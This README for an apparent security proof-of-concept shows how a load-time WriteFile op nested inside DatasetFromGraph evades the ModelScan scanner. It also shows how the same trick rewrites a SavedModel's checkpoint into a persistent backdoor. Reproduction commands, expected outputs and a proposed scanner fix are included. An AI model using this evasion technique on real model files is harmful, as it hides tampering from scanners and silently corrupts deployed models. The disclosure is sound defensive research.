
SavedModel scanner bypass via nested DatasetFromGraph WriteFile

Three SavedModels that demonstrate, in order: (1) ModelScan does flag WriteFile when it can see it; (2) nesting the same op inside DatasetFromGraph makes it invisible to ModelScan while it still runs at load; and (3) the same nesting technique can rewrite the model's own checkpoint, turning the file write into a persistent backdoor.

One thing to be clear about up front. The top_level_writefile model is a control, not a finding. ModelScan flagging it as HIGH is the intended, healthy behaviour: it proves the scanner does detect WriteFile when it's visible. The actual bypass is nested_writefile, and the backdoor is self_poisoning_writefile. Both of those run the same load-time WriteFile and both pass ModelScan with zero issues.

Tested against the latest published versions of TensorFlow and ModelScan on PyPI (TensorFlow 2.21.0, ModelScan 0.8.8).

What's in the box

build_poc.py          rebuild all three SavedModels
verify_poc.py         run ModelScan + load each model + the self-poison
                      first/second-load differential, all in an isolated cwd
requirements.txt      pinned tensorflow and modelscan
sample_results.json   sanitised output from a passing run
models/
  top_level_writefile/        ordinary WriteFile in the top-level GraphDef
  nested_writefile/           same WriteFile hidden inside a nested GraphDef
  self_poisoning_writefile/   nested WriteFile that overwrites the model's
                              own variables/ checkpoint at load

What each case shows

top_level_writefile: control (not a finding)

This case exists to prove the baseline. The top-level GraphDef contains the WriteFile op directly. ModelScan 0.8.8 reports one HIGH issue with operator = WriteFile, and the model writes its marker file when loaded. The control passing is the expected outcome: it's the "ModelScan does detect WriteFile when it's visible" half of the differential. Without this case there's no way to say what the bypass is bypassing.

nested_writefile: bypass

Same WriteFile, same payload, same load-time effect. The only difference is location. The top-level GraphDef contains only Const, DatasetFromGraph, and DatasetToGraphV2. The WriteFile sits inside a serialised GraphDef carried as the bytes of a Const string tensor, and DatasetFromGraph consumes that string as a second parser root.

ModelScan walks the top-level nodes and the function library. It doesn't parse Const string tensors as nested GraphDefs, so the hidden WriteFile is invisible to it. The scan reports total_issues = 0. At load time TensorFlow traverses the inner graph through the TF1 legacy_init_op and runs the hidden write anyway.

saved_model_cli show --all is also blind to the nested op.

self_poisoning_writefile: persistent backdoor

A serving model with one variable w and signature y = x * w. The model ships with w = 2.0 on disk. The same nested DatasetFromGraph mechanism carries two hidden WriteFile nodes targeting relative paths variables/variables.data-00000-of-00001 and variables/variables.index. The contents are checkpoint bytes from a sibling template model built with w = 1337.0.

At first load:

  1. TF restores w = 2.0 from disk into memory.
  2. The legacy_init_op runs the hidden writes, which overwrite the on-disk checkpoint with the w = 1337.0 bytes.
  3. Inference still uses the in-memory w = 2.0, so y(3.0) = 6.0.

The model behaves correctly on this first load, which means a deployment pipeline that smoke-tests a model once and promotes it on success would see no anomaly.

On every load after that:

  1. TF restores w = 1337.0 from the now-poisoned checkpoint.
  2. Inference returns y(3.0) = 4011.0.

ModelScan reports the model clean for this case too.
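
The first-load versus later-load behaviour follows purely from the order of restore and init. The sketch below is a toy simulation in plain Python, not TensorFlow: ToyModel, load, and the one-line text "checkpoint" are hypothetical stand-ins that only mirror the restore-then-overwrite ordering described above.

```python
import tempfile
from pathlib import Path


class ToyModel:
    """Stand-in for a loaded model computing y = x * w (not a real SavedModel)."""

    def __init__(self, w: float):
        self.w = w

    def __call__(self, x: float) -> float:
        return x * self.w


def load(checkpoint: Path, poison: str = "1337.0") -> ToyModel:
    # Step 1: restore the variable from disk into memory.
    model = ToyModel(float(checkpoint.read_text()))
    # Step 2: the init step runs afterwards and overwrites the on-disk checkpoint.
    checkpoint.write_text(poison)
    # Step 3: the returned model still holds the value restored in step 1.
    return model


def demo() -> tuple[float, float]:
    with tempfile.TemporaryDirectory() as tmp:
        checkpoint = Path(tmp) / "w.txt"
        checkpoint.write_text("2.0")       # shipped weight
        first = load(checkpoint)(3.0)      # uses the in-memory w = 2.0
        second = load(checkpoint)(3.0)     # restores the rewritten w = 1337.0
        return first, second
```

Calling demo() returns (6.0, 4011.0): the first load looks benign because the overwrite happens after the restore, and every later load picks up the replaced value.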

Requirements

The pinned versions match the latest stable releases on PyPI at the time of writing.

python >= 3.10
tensorflow == 2.21.0   # latest on PyPI
modelscan == 0.8.8     # latest on PyPI

Install:

pip install -r requirements.txt

Reproducing the differential

The repo ships with the prebuilt models under models/. To verify all three cases:

python verify_poc.py

The verifier picks a fresh temp directory, runs ModelScan and saved_model_cli show --all on each model, then loads each model in a child Python process. For the marker cases the child cwd is set to the per-case workdir so the relative marker path resolves there. For the self-poisoning case, the model is copied into the workdir, the child cwd is set to the copied model directory, and the model is loaded twice with its variables/ hashes captured before, after the first load, and after the second load.
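
The before/after hash comparison can be sketched with the standard library alone. This is an illustration of the idea rather than the code in verify_poc.py; hash_tree and changed_files are hypothetical helper names, and the file contents in demo are placeholders rather than real checkpoint bytes.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict[str, str]:
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def changed_files(before: dict[str, str], after: dict[str, str]) -> list[str]:
    """Return paths that were added, removed, or whose digest differs."""
    return sorted(k for k in before.keys() | after.keys() if before.get(k) != after.get(k))


def demo() -> list[str]:
    with tempfile.TemporaryDirectory() as tmp:
        variables = Path(tmp) / "variables"
        variables.mkdir()
        (variables / "variables.index").write_bytes(b"index")
        (variables / "variables.data-00000-of-00001").write_bytes(b"w=2.0")
        before = hash_tree(variables)
        # Simulate the load-time overwrite of one checkpoint shard.
        (variables / "variables.data-00000-of-00001").write_bytes(b"w=1337.0")
        after = hash_tree(variables)
        return changed_files(before, after)
```

Taking a snapshot before the first load, after the first load, and after the second load gives the two comparisons the verifier reports: the first pair should differ and the second pair should not.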

Expected output:

{
  "top_level_writefile": {
    "pass": true,
    "intent": "control: ModelScan is expected to detect top-level WriteFile",
    "top_level_has_writefile": true,
    "modelscan_total_issues": 1,
    "modelscan_flagged_writefile": true,
    "marker_written": true
  },
  "nested_writefile": {
    "pass": true,
    "intent": "bypass: ModelScan is expected to miss nested WriteFile, load is expected to run it anyway",
    "top_level_has_writefile": false,
    "nested_has_writefile": true,
    "modelscan_total_issues": 0,
    "modelscan_issues_empty": true,
    "marker_written": true
  },
  "self_poisoning_writefile": {
    "pass": true,
    "intent": "persistent backdoor: first load returns benign output, on-disk checkpoint is rewritten, second load returns attacker-chosen output",
    "top_level_has_writefile": false,
    "nested_has_writefile": true,
    "modelscan_total_issues": 0,
    "modelscan_issues_empty": true,
    "input": 3.0,
    "expected_benign_output": 6.0,
    "expected_poison_output": 4011.0,
    "first_load_output": 6.0,
    "second_load_output": 4011.0,
    "first_load_matches_benign": true,
    "second_load_matches_poison": true,
    "checkpoint_changed_after_first_load": true,
    "checkpoint_stable_after_second_load": true
  }
}
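
If you want to check a results file mechanically, the differential reduces to a handful of field comparisons. The helper below is a sketch that assumes the file has the same top-level layout and key names as the expected output above; load_results and differential_holds are hypothetical names, not functions from verify_poc.py.

```python
import json
from pathlib import Path


def load_results(path: str) -> dict:
    """Read a results file such as sample_results.json."""
    return json.loads(Path(path).read_text(encoding="utf-8"))


def differential_holds(results: dict) -> bool:
    """True when the control is flagged, the bypass is missed, and the backdoor fires."""
    control = results["top_level_writefile"]
    bypass = results["nested_writefile"]
    poison = results["self_poisoning_writefile"]
    checks = [
        control["modelscan_flagged_writefile"],   # scanner sees the visible op
        control["marker_written"],
        bypass["modelscan_total_issues"] == 0,    # scanner misses the nested op
        bypass["marker_written"],                 # but the write still ran
        poison["modelscan_total_issues"] == 0,
        poison["first_load_output"] == poison["expected_benign_output"],
        poison["second_load_output"] == poison["expected_poison_output"],
        poison["checkpoint_changed_after_first_load"],
    ]
    return all(checks)
```

For example, differential_holds(load_results("sample_results.json")) should be true for a passing run if the layout assumption holds.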

If you want to rebuild the models yourself before verifying:

python build_poc.py --overwrite
python verify_poc.py

If you want the loader to use a directory you choose instead of a temp directory:

python verify_poc.py --workdir ./scratch

After a run the marker cases leave files at:

./scratch/top_level_writefile/tfhunt_markers/top_level_writefile.txt
./scratch/nested_writefile/tfhunt_markers/nested_writefile.txt

Both contain tfhunt_writefile_payload\n.

The self-poisoning case leaves a copy of the model with the poisoned checkpoint at:

./scratch/self_poisoning_writefile/self_poisoning_writefile/

Reload that copy directly with tf.saved_model.load and you'll see y(3.0) = 4011.0 instead of the original 6.0.

Manual verification

If you don't want to trust verify_poc.py, each claim below can be checked with the stock tooling. Every step assumes your cwd is the repo root, and ends back there.

1. ModelScan flags the control, misses the bypass

modelscan scan -p ./models/top_level_writefile
modelscan scan -p ./models/nested_writefile

The first scan reports one HIGH issue with operator = WriteFile, which is the control behaving correctly. The second scan reports total_issues = 0 on a model that performs the same load-time write.

2. saved_model_cli is blind to the nested op

python -m tensorflow.python.tools.saved_model_cli show --dir ./models/nested_writefile --all

The relevant line in the output is:

The MetaGraph with tag set ['serve'] contains the following ops: {'Const', 'DatasetToGraphV2', 'DatasetFromGraph'}

No mention of WriteFile.

3. tf.saved_model.load runs the hidden write

The marker path baked into the model is relative, so the write lands wherever the loader's cwd is. Run the load in a clean working directory.

Linux / macOS:

mkdir manual_load && cd manual_load
python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')"
ls tfhunt_markers
cat tfhunt_markers/nested_writefile.txt
cd ..

Windows PowerShell:

New-Item -ItemType Directory manual_load | Out-Null; Set-Location manual_load
python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')"
Get-ChildItem tfhunt_markers
Get-Content tfhunt_markers\nested_writefile.txt
Set-Location ..

Expected file content:

tfhunt_writefile_payload
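
A cross-platform way to observe the same effect is to run the loader as a child process with a fresh temporary directory as its cwd and list whatever it leaves behind. The helper below is a sketch; files_written_by is a hypothetical name, and demo uses a stand-in child that writes to a relative path instead of loading the model, so it runs without TensorFlow.

```python
import subprocess
import sys
import tempfile
from pathlib import Path


def files_written_by(cmd: list[str]) -> dict[str, bytes]:
    """Run cmd with a fresh temp directory as cwd; return the files it left there."""
    with tempfile.TemporaryDirectory() as tmp:
        subprocess.run(cmd, cwd=tmp, check=True)
        root = Path(tmp)
        return {
            p.relative_to(root).as_posix(): p.read_bytes()
            for p in root.rglob("*")
            if p.is_file()
        }


def demo() -> dict[str, bytes]:
    # Stand-in child process: writes to a relative path, as the marker write does.
    child = (
        "import os; os.makedirs('tfhunt_markers'); "
        "open('tfhunt_markers/demo.txt', 'wb').write(b'payload')"
    )
    return files_written_by([sys.executable, "-c", child])
```

To try it against the real model, replace the child code with the tf.saved_model.load one-liner from this step and pass an absolute path to models/nested_writefile, since the relative ../models/... path no longer resolves once the cwd is a temp directory.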

4. Self-poisoning rewrites the checkpoint on first load

The relative WriteFile targets are variables/..., so the load must run with cwd set to a copy of the model directory. The copy step is important: without it, the bundled model itself would get poisoned.

Linux / macOS:

cp -r models/self_poisoning_writefile manual_poison
cd manual_poison
sha256sum variables/variables.data-00000-of-00001
python -c "import tensorflow as tf; tf.saved_model.load('.')"
sha256sum variables/variables.data-00000-of-00001

Windows PowerShell:

Copy-Item -Recurse models/self_poisoning_writefile manual_poison
Set-Location manual_poison
Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256
python -c "import tensorflow as tf; tf.saved_model.load('.')"
Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256

The two hashes will differ. The on-disk checkpoint has been physically overwritten by the load.

5. Second load returns the attacker's weights

Stay in the manual_poison/ directory from step 4 and run the load again, this time invoking the serving signature:

python -c "import tensorflow as tf; loaded = tf.saved_model.load('.'); out = loaded.signatures['serving_default'](x=tf.constant(3.0)); print(float(next(iter(out.values())).numpy()))"

Expected output:

4011.0

The shipped model is y = x * w with w = 2.0, so a clean y(3.0) would be 6.0. After the load-time write in step 4 rewrote the checkpoint to w = 1337.0, the second load reads the poisoned weights and returns 4011.0. Return to the repo root with cd .. when done.

Troubleshooting

  • ModuleNotFoundError: No module named 'tensorflow'. TensorFlow isn't installed in the active environment. Run pip install -r requirements.txt from the repo root.
  • pip install resolution fails on modelscan. It needs Python 3.10-3.12. If the extras aren't pulled in, install with pip install 'modelscan[tensorflow,h5py]==0.8.8'.
  • Step 3's marker file doesn't appear. The cwd isn't where you think it is. Add import os; print(os.getcwd()) before the tf.saved_model.load call to confirm.
  • Step 5 still returns 6.0. The cwd in step 4 wasn't the copied manual_poison directory, so nothing was poisoned. Copy the model again from the bundle (models/self_poisoning_writefile) and rerun step 4 with the new copy. Or just rebuild everything from scratch with python build_poc.py --overwrite.
  • saved_model_cli: command not found. It ships with TensorFlow but isn't always on PATH. Use the explicit form python -m tensorflow.python.tools.saved_model_cli show ....

Why this is interesting

ModelScan flags WriteFile as HIGH when it sees it in the top-level graph, so the operator is already on the unsafe list. The bypass isn't about the operator. It's about where it's allowed to hide.

The same idea generalises to any side-effecting op that TensorFlow will run from inside an inner dataset graph. WriteFile is the cleanest demonstration because it's already on ModelScan's denylist, which makes the top-level-vs-nested differential unambiguous.

The self-poisoning case turns that file-write primitive into a persistent output-manipulation backdoor that's hard to catch with a single-load smoke test, because the malicious output only appears on the second and later loads.

The hidden write also runs in tf.lite.TFLiteConverter.from_saved_model, tf2onnx.convert, TensorFlow Serving, and the NVIDIA Triton TensorFlow backend. Those tests live outside this PoC bundle to keep it small and auditable, but they use models built the same way.

Safety

These models have exactly two load-time side effects, and only the control case exposes its write in the top-level graph:

  • top_level_writefile and nested_writefile write tfhunt_writefile_payload\n to a relative path tfhunt_markers/<name>.txt, resolved against the loader's working directory.
  • self_poisoning_writefile overwrites two relative paths variables/variables.data-00000-of-00001 and variables/variables.index with the byte content of a w = 1337.0 template checkpoint. Because the verifier sets cwd to the copied model directory, those writes only touch the copy, not the bundled artifact.

None of the models reach for absolute paths, environment variables, network, credentials, or any other resource.

If you want to inspect the nested graphs yourself without loading the models, verify_poc.py's inspect_saved_model function parses the serialised inner GraphDefs and lists their nodes.
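
For readers who would rather not import TensorFlow at all, the same kind of inspection can be approximated by reading the protobuf wire format directly. The sketch below is not the inspect_saved_model function from verify_poc.py. It assumes the field numbers listed in its first comment (taken from TensorFlow's public .proto files), treats any string tensor that happens to parse as a message as a candidate nested graph (a heuristic), and does not walk the function library. The ld and demo helpers exist only to build a tiny hand-made graph for illustration.

```python
# Assumed field numbers: SavedModel.meta_graphs=2, MetaGraphDef.graph_def=2,
# GraphDef.node=1, NodeDef.op=2, NodeDef.attr=5 (map entry value=2),
# AttrValue.tensor=8, TensorProto.string_val=8.
MAX_DEPTH = 4


def read_varint(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode one base-128 varint starting at pos; return (value, next_pos)."""
    value = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7


def fields(buf: bytes):
    """Yield (field_number, payload) for every length-delimited field in buf."""
    pos = 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        number, wire_type = key >> 3, key & 7
        if wire_type == 0:      # varint: skip the value
            _, pos = read_varint(buf, pos)
        elif wire_type == 1:    # fixed64
            pos += 8
        elif wire_type == 5:    # fixed32
            pos += 4
        elif wire_type == 2:    # strings, bytes, sub-messages
            size, pos = read_varint(buf, pos)
            if pos + size > len(buf):
                raise ValueError("truncated field")
            yield number, buf[pos:pos + size]
            pos += size
        else:
            raise ValueError("unsupported wire type")


def path(buf: bytes, *numbers: int):
    """Yield payloads reached by following a chain of field numbers."""
    if not numbers:
        yield buf
        return
    for number, payload in fields(buf):
        if number == numbers[0]:
            yield from path(payload, *numbers[1:])


def graph_ops(graph: bytes, depth: int = 0) -> list[tuple[int, str]]:
    """List (depth, op) per node, recursing into string tensors that parse as graphs."""
    found = []
    for node in path(graph, 1):
        for op in path(node, 2):
            found.append((depth, op.decode("utf-8", "replace")))
        if depth >= MAX_DEPTH:
            continue
        for blob in path(node, 5, 2, 8, 8):
            try:
                found.extend(graph_ops(blob, depth + 1))
            except (ValueError, IndexError):
                pass  # not a protobuf message, so not a nested graph
    return found


def ld(number: int, payload: bytes) -> bytes:
    """Encode one length-delimited field (demo helper, field numbers below 16 only)."""
    size, out = len(payload), bytearray([number << 3 | 2])
    while size > 0x7F:
        out.append(size & 0x7F | 0x80)
        size >>= 7
    out.append(size)
    return bytes(out) + payload


def demo() -> list[tuple[int, str]]:
    inner = ld(1, ld(2, b"WriteFile"))                             # nested GraphDef
    attr = ld(5, ld(1, b"value") + ld(2, ld(8, ld(8, inner))))     # attr["value"].tensor
    const = ld(1, ld(2, b"Const") + attr)
    return graph_ops(const + ld(1, ld(2, b"DatasetFromGraph")))
```

On the hand-made graph, demo() lists Const and DatasetFromGraph at depth 0 and WriteFile at depth 1. Under the same field-number assumptions, the top-level graphs of a real file would be reached with path(saved_model_bytes, 2, 2), each of which can be passed to graph_ops.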

Suggested fix

The gap in modelscan.scanners.SavedModelTensorflowOpScan is that it walks GraphDef.node and the function library on the top-level MetaGraphDef but doesn't recurse into ops whose inputs are serialised GraphDef bytes. The fix is to treat those ops as parser roots.

Sketch of what the scan loop could look like:

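from google.protobuf.message import DecodeError
from tensorflow.core.framework.graph_pb2 import GraphDef

NESTED_GRAPHDEF_OPS = {
    "DatasetFromGraph",   # ops that accept a serialised GraphDef in a string input
    "XlaCallModule",      # carries a serialised StableHLO / MLIR module
}

MAX_RECURSION_DEPTH = 4
MAX_INNER_BYTES = 10 * 1024 * 1024

# UNSAFE_OPERATORS, report_issue and resolve_const_string_input are placeholders
# for the scanner's own denylist, reporting hook and Const-input resolver.


def scan_nodes(nodes, graph_def, depth):
    for node in nodes:
        if node.op in UNSAFE_OPERATORS:
            report_issue(node, depth=depth)
        if node.op in NESTED_GRAPHDEF_OPS:
            inner_bytes = resolve_const_string_input(node, "graph_def", graph_def)
            if inner_bytes is None or len(inner_bytes) > MAX_INNER_BYTES:
                continue
            inner = GraphDef()
            try:
                inner.ParseFromString(inner_bytes)
            except DecodeError:
                continue  # payload is not a GraphDef (for example an MLIR module)
            scan_graphdef(inner, depth=depth + 1)


def scan_graphdef(graph_def, depth=0):
    if depth > MAX_RECURSION_DEPTH:
        return
    scan_nodes(graph_def.node, graph_def, depth)
    for fn in graph_def.library.function:
        # Same walk as above, on the function library.
        scan_nodes(fn.node_def, graph_def, depth)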

The bounded recursion depth and byte cap stop a malicious model from turning a recursive scan into a parser DoS.

The same logic would help any scanner that gates .pb files on a top-level op walk. For TensorFlow itself, documenting that any op carrying serialised IR (DatasetFromGraph, XlaCallModule, and so on) should be treated as a parser root by external scanners would help downstream tooling write fixes that cover all of them at once.

Files generated by a run

verify_poc.py writes:

  • verification.json next to the script. This contains absolute paths from your machine, so it's .gitignored and is not part of the shipped artifact.

build_poc.py writes:

  • models/top_level_writefile/saved_model.pb
  • models/nested_writefile/saved_model.pb
  • models/self_poisoning_writefile/saved_model.pb
  • models/self_poisoning_writefile/variables/variables.data-00000-of-00001
  • models/self_poisoning_writefile/variables/variables.index

The first two models have empty variables/ directories. That's expected for those graphs.

Environment used to validate

Python 3.12.3
tensorflow 2.21.0
modelscan 0.8.8
Windows host